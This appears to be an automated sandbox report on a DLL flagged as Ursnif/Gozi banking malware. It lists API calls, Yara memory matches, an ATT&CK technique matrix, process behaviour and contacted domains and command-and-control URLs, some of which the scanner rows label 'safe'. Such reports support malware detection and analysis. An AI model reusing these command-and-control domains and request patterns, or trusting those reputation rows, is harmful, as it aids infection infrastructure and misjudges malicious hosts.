                      Source: loaddll32.exe, 00000002.00000002.680579668.00000000014E0000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000000.493972820.0000000003550000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.682312737.0000000003A50000.00000002.00020000.sdmp, rundll32.exe, 00000009.00000000.507430599.00000000036D0000.00000002.00020000.sdmp, rundll32.exe, 0000000A.00000000.510567830.0000000003A80000.00000002.00020000.sdmpBinary or memory string: Program Manager
                      Source: loaddll32.exe, 00000002.00000002.680579668.00000000014E0000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000000.493972820.0000000003550000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.682312737.0000000003A50000.00000002.00020000.sdmp, rundll32.exe, 00000009.00000000.507430599.00000000036D0000.00000002.00020000.sdmp, rundll32.exe, 0000000A.00000000.510567830.0000000003A80000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: loaddll32.exe, 00000002.00000002.680579668.00000000014E0000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000000.493972820.0000000003550000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.682312737.0000000003A50000.00000002.00020000.sdmp, rundll32.exe, 00000009.00000000.507430599.00000000036D0000.00000002.00020000.sdmp, rundll32.exe, 0000000A.00000000.510567830.0000000003A80000.00000002.00020000.sdmpBinary or memory string: Progman
                      Source: loaddll32.exe, 00000002.00000002.680579668.00000000014E0000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000000.493972820.0000000003550000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.682312737.0000000003A50000.00000002.00020000.sdmp, rundll32.exe, 00000009.00000000.507430599.00000000036D0000.00000002.00020000.sdmp, rundll32.exe, 0000000A.00000000.510567830.0000000003A80000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Windows\System32\loaddll32.exeCode function: GetLocaleInfoW,2_2_6E909EB5
                      Source: C:\Windows\System32\loaddll32.exeCode function: GetLocaleInfoW,2_2_6E930E4C
                      Source: C:\Windows\System32\loaddll32.exeCode function: EnumSystemLocalesW,2_2_6E930429
                      Source: C:\Windows\System32\loaddll32.exeCode function: EnumSystemLocalesW,2_2_6E93E448
                      Source: C:\Windows\System32\loaddll32.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,2_2_6E93EA21
                      Source: C:\Windows\System32\loaddll32.exeCode function: EnumSystemLocalesW,2_2_6E93E3AD
                      Source: C:\Windows\System32\loaddll32.exeCode function: EnumSystemLocalesW,2_2_6E93E344
                      Source: C:\Windows\System32\loaddll32.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,2_2_6E93E0A2
                      Source: C:\Windows\System32\loaddll32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,2_2_6E93E84C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,6_2_6E909EB5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,6_2_6E930E4C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,6_2_6E930429
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,6_2_6E93E448
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,6_2_6E93EA21
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,6_2_6E93E3AD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,6_2_6E93E344
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,6_2_6E93E0A2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,6_2_6E93E84C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,9_2_6E909EB5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,9_2_6E930E4C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,9_2_6E930429
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,9_2_6E93E448
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,9_2_6E93EA21
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,9_2_6E93E3AD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,9_2_6E93E344
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,9_2_6E93E0A2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,9_2_6E93E84C
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_00A3A82B cpuid 2_2_00A3A82B
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E8D1172 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,2_2_6E8D1172
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E92FF15 _free,_free,_free,GetTimeZoneInformation,_free,2_2_6E92FF15
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E8D1825 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,2_2_6E8D1825
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_00A3A82B RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,2_2_00A3A82B

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 00000006.00000003.533746725.0000000005BD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.636681449.000000000302F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.533976694.0000000005BD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.504323310.00000000033A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.533515882.0000000005BD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.534880581.0000000005BD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.504453147.00000000033A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.504380266.00000000033A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.504256505.00000000033A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.504206651.00000000033A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.504111647.00000000033A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.533633690.0000000005BD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.533322281.0000000005BD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.533883648.0000000005BD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.504159265.00000000033A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.668796165.000000000585F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.625115852.000000000595D000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.547848145.000000000322B000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.579417295.0000000005A5B000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.504691166.00000000033A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.504416763.00000000033A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.533401474.0000000005BD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.593657647.000000000312D000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.533448207.0000000005BD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.681690642.0000000002FB0000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 7088, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 4432, type: MEMORYSTR
                      Source: Yara matchFile source: 2.2.loaddll32.exe.2d494a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.3.rundll32.exe.10ba31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.10da31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.rundll32.exe.318a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.6e8d0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.rundll32.exe.318a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.6e8d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.3.rundll32.exe.10ba31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.loaddll32.exe.6e8d0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.31a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.0.rundll32.exe.6e8d0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.loaddll32.exe.2d494a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.loaddll32.exe.a30000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.53794a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.53794a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.3.rundll32.exe.109a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.0.rundll32.exe.6e8d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.loaddll32.exe.b3a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.3.rundll32.exe.109a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.loaddll32.exe.b3a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.10da31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000005.00000003.431870114.00000000010D0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000003.446004934.0000000001090000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.468068395.0000000000B30000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.682624549.0000000005379000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000003.469511127.00000000010B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.430400747.0000000003180000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.681378105.0000000002D49000.00000004.00000040.sdmp, type: MEMORY

                      Remote Access Functionality:

                      barindex
                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 00000006.00000003.533746725.0000000005BD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.636681449.000000000302F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.533976694.0000000005BD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.504323310.00000000033A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.533515882.0000000005BD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.534880581.0000000005BD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.504453147.00000000033A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.504380266.00000000033A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.504256505.00000000033A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.504206651.00000000033A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.504111647.00000000033A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.533633690.0000000005BD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.533322281.0000000005BD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.533883648.0000000005BD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.504159265.00000000033A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.668796165.000000000585F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.625115852.000000000595D000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.547848145.000000000322B000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.579417295.0000000005A5B000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.504691166.00000000033A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.504416763.00000000033A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.533401474.0000000005BD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.593657647.000000000312D000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.533448207.0000000005BD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.681690642.0000000002FB0000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 7088, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 4432, type: MEMORYSTR
                      Source: Yara matchFile source: 2.2.loaddll32.exe.2d494a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.3.rundll32.exe.10ba31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.10da31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.rundll32.exe.318a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.6e8d0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.rundll32.exe.318a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.6e8d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.3.rundll32.exe.10ba31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.loaddll32.exe.6e8d0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.31a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.0.rundll32.exe.6e8d0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.loaddll32.exe.2d494a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.loaddll32.exe.a30000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.53794a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.53794a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.3.rundll32.exe.109a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.0.rundll32.exe.6e8d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.loaddll32.exe.b3a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.3.rundll32.exe.109a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.loaddll32.exe.b3a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.10da31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000005.00000003.431870114.00000000010D0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000003.446004934.0000000001090000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.468068395.0000000000B30000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.682624549.0000000005379000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000003.469511127.00000000010B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.430400747.0000000003180000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.681378105.0000000002D49000.00000004.00000040.sdmp, type: MEMORY

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation2Path InterceptionProcess Injection112Virtualization/Sandbox Evasion1Input Capture1System Time Discovery2Remote ServicesInput Capture1Exfiltration Over Other Network MediumEncrypted Channel11Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsNative API1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsProcess Injection112LSASS MemorySecurity Software Discovery21Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Deobfuscate/Decode Files or Information1Security Account ManagerVirtualization/Sandbox Evasion1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information2NTDSProcess Discovery2Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol14SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptRundll321LSA SecretsAccount Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsSystem Owner/User Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncRemote System Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemSystem Information Discovery23Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 500413 Sample: 616412739e268.dll Startdate: 12/10/2021 Architecture: WINDOWS Score: 88 31 msn.com 2->31 47 Found malware configuration 2->47 49 Multi AV Scanner detection for submitted file 2->49 51 Yara detected  Ursnif 2->51 8 loaddll32.exe 1 2->8         started        signatures3 process4 dnsIp5 41 40.101.60.226, 443, 49783, 49821 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 8->41 43 breuranel.website 8->43 45 10 other IPs or domains 8->45 55 Writes or reads registry keys via WMI 8->55 57 Writes registry values via WMI 8->57 12 rundll32.exe 8->12         started        15 cmd.exe 1 8->15         started        17 rundll32.exe 8->17         started        19 rundll32.exe 8->19         started        signatures6 process7 signatures8 59 System process connects to network (likely due to code injection or exploit) 12->59 61 Writes registry values via WMI 12->61 21 WerFault.exe 23 9 12->21         started        24 rundll32.exe 15->24         started        27 WerFault.exe 9 17->27         started        29 WerFault.exe 2 9 19->29         started        process9 dnsIp10 33 192.168.2.1 unknown unknown 21->33 35 breuranel.website 24->35 37 areuranel.website 24->37 39 9 other IPs or domains 24->39 53 System process connects to network (likely due to code injection or exploit) 24->53 signatures11

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      616412739e268.dll6%VirustotalBrowse
                      616412739e268.dll24%ReversingLabsWin32.Infostealer.Gozi

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      2.2.loaddll32.exe.a30000.0.unpack100%AviraHEUR/AGEN.1108168Download File
                      6.2.rundll32.exe.31a0000.0.unpack100%AviraHEUR/AGEN.1108168Download File

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      https://areuranel.website/0%Avira URL Cloudsafe
                      https://breuranel.website/0%Avira URL Cloudsafe
                      https://wweuranel.website/0%Avira URL Cloudsafe
                      https://deff.nelreports.net/api/report?cat=msn0%URL Reputationsafe
                      https://mem.gfx.ms/meversion/?partner=msn&amp;market=en-us&quot;0%Avira URL Cloudsafe
                      https://areuranel.website/V0%Avira URL Cloudsafe
                      https://breuranel.website/liopolo/QA56VbJ0mf8IO/bu7B6hDH/DMBL8lGiGevOerWP3oEITXA/XSYJaQdf97/rSRSo5gw0%Avira URL Cloudsafe
                      https://areuranel.website/liopolo/qMPdkFO4cnrxNn/DIGveFyn_2Bf4Yye5GCKi/4Qd67_2BeQZdWYi_/2BSsROrcax_20%Avira URL Cloudsafe
                      https://areuranel.website:443/liopolo/qMPdkFO4cnrxNn/DIGveFyn_2Bf4Yye5GCKi/4Qd67_2BeQZdWYi_/2BSsROrc0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      msn.com
                      		13.82.28.61
                      		truefalse
                        		high
                        outlook.com
                        		40.97.161.50
                        		truefalse
                          		high
                          HHN-efz.ms-acdc.office.com
                          		52.98.207.210
                          		truefalse
                            		high
                            FRA-efz.ms-acdc.office.com
                            		52.98.207.210
                            		truefalse
                              		high
                              www.msn.com
                              		unknown
                              		unknownfalse
                                		high
                                www.outlook.com
                                		unknown
                                		unknownfalse
                                  		high
                                  areuranel.website
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    breuranel.website
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      outlook.office365.com
                                      		unknown
                                      		unknownfalse
                                        		high

                                        Contacted URLs

                                        NameMaliciousAntivirus DetectionReputation
                                        https://outlook.com/signup/liopolo/_2FIM7vtUZ4D/xYsj75o0T3l/xgIGXyko1bBc35/qMEGgdco4EjP8aQKQAv1_/2Fr_2B9CI4wQ8pfr/Ae2iDA4fgxuX_2F/EFvlU1RKcf_2BhblV1/R4qA8rb50/6GzaaVaZ467uvOz0B0BG/K6jq9ZPGaLm0dRA_2Bj/N_2Bpix6pkAKp3MF04Fjk4/gUVThkiIQADOb/DN4NS4MK/cUs7VKKK39GCKuME9SOTcIm/_2FCC2gu/C.jrefalse
                                          		high
                                          https://www.outlook.com/signup/liopolo/4n8rYhECWMDt1xafNsN/Eaa1J0ldXQTsDJvMLeSORg/0uI4SoaziSZwM/OT0v9gJP/37ksb0fn_2FMie_2BYo4csJ/dqKZMmwVVY/NW0eW6kdSEZXJYqwn/QNXYETIahUBU/o58GZV2YU8a/BbpCAOptavmy35/f7j8F4VRrMxGtvE_2FpUR/raE_2Bxf0kZoKM1o/ZbBDSIO0tnuHu4l/cpfED0PavpBMJm1ykA/Lck.jrefalse
                                            		high
                                            https://msn.com/mail/liopolo/Vn4JvoFId6Cp3NLYZ/ukfCWWcxchPj/qCUcA7g4p8o/IzqGGngZx49dkT/_2Fc3sEBBXvAEYkPgeGA_/2By9PpRoLgfve_2F/vhfdT7HCV506AwB/36mBvSW_2FRJGuHNuA/yE6OJX0fi/uPoeQfh7fRd0REpiPmsf/t9myfegLaxJw_2B8ay_/2FKKbEnJu_2BUYEu1pJNUs/ydzaPjLRj/fW1.jrefalse
                                              		high
                                              https://outlook.com/signup/liopolo/4n8rYhECWMDt1xafNsN/Eaa1J0ldXQTsDJvMLeSORg/0uI4SoaziSZwM/OT0v9gJP/37ksb0fn_2FMie_2BYo4csJ/dqKZMmwVVY/NW0eW6kdSEZXJYqwn/QNXYETIahUBU/o58GZV2YU8a/BbpCAOptavmy35/f7j8F4VRrMxGtvE_2FpUR/raE_2Bxf0kZoKM1o/ZbBDSIO0tnuHu4l/cpfED0PavpBMJm1ykA/Lck.jrefalse
                                                		high
                                                https://outlook.office365.com/signup/liopolo/_2FIM7vtUZ4D/xYsj75o0T3l/xgIGXyko1bBc35/qMEGgdco4EjP8aQKQAv1_/2Fr_2B9CI4wQ8pfr/Ae2iDA4fgxuX_2F/EFvlU1RKcf_2BhblV1/R4qA8rb50/6GzaaVaZ467uvOz0B0BG/K6jq9ZPGaLm0dRA_2Bj/N_2Bpix6pkAKp3MF04Fjk4/gUVThkiIQADOb/DN4NS4MK/cUs7VKKK39GCKuME9SOTcIm/_2FCC2gu/C.jrefalse
                                                  		high
                                                  https://www.outlook.com/signup/liopolo/_2FIM7vtUZ4D/xYsj75o0T3l/xgIGXyko1bBc35/qMEGgdco4EjP8aQKQAv1_/2Fr_2B9CI4wQ8pfr/Ae2iDA4fgxuX_2F/EFvlU1RKcf_2BhblV1/R4qA8rb50/6GzaaVaZ467uvOz0B0BG/K6jq9ZPGaLm0dRA_2Bj/N_2Bpix6pkAKp3MF04Fjk4/gUVThkiIQADOb/DN4NS4MK/cUs7VKKK39GCKuME9SOTcIm/_2FCC2gu/C.jrefalse
                                                    		high
                                                    https://msn.com/mail/liopolo/iPe0RJr3YRoIqgJZ/bp29G1GzQQlGJM_/2FuLuVprzaPw0SE4HN/zn7OVuGKs/tq7CtgIlmwdVETSdZ_2B/b8UUaR4yA5m9yE7vka1/Gh0JtvuATrVobNbwlsuYfN/IReexc6mib3Oj/OUfheoEg/Oot_2BsNxyrozYIcd4Px1xV/TZHusM6SVs/2zs_2FZfacHwT9roF/sfywcfJ4/Yw.jrefalse
                                                      		high
                                                      https://outlook.office365.com/signup/liopolo/4n8rYhECWMDt1xafNsN/Eaa1J0ldXQTsDJvMLeSORg/0uI4SoaziSZwM/OT0v9gJP/37ksb0fn_2FMie_2BYo4csJ/dqKZMmwVVY/NW0eW6kdSEZXJYqwn/QNXYETIahUBU/o58GZV2YU8a/BbpCAOptavmy35/f7j8F4VRrMxGtvE_2FpUR/raE_2Bxf0kZoKM1o/ZbBDSIO0tnuHu4l/cpfED0PavpBMJm1ykA/Lck.jrefalse
                                                        		high

                                                        URLs from Memory and Binaries

                                                        NameSourceMaliciousAntivirus DetectionReputation
                                                        https://areuranel.website/rundll32.exe, 00000006.00000002.681813833.0000000003669000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://outlook.office365.com///loaddll32.exe, 00000002.00000003.593552151.0000000000C94000.00000004.00000001.sdmpfalse
                                                          		high
                                                          https://web.vortex.data.msn.com/collect/v1/t.gif?name=%27Ms.Webi.PageView%27&amp;ver=%272.1%27&amp;aloaddll32.exe, 00000002.00000003.504524772.0000000000CD9000.00000004.00000001.sdmp, rundll32.exe, 00000006.00000003.534697625.0000000003688000.00000004.00000001.sdmpfalse
                                                            		high
                                                            https://www.outlook.com/signup/liopolo/_2FIM7vtUZ4D/xYsj75o0T3l/xgIGXyko1bBc35/qMEGgdco4EjP8aQKQAv1_loaddll32.exe, 00000002.00000003.593552151.0000000000C94000.00000004.00000001.sdmp, loaddll32.exe, 00000002.00000002.678421044.0000000000C84000.00000004.00000020.sdmpfalse
                                                              		high
                                                              https://breuranel.website/rundll32.exe, 00000006.00000003.625046628.0000000003669000.00000004.00000001.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
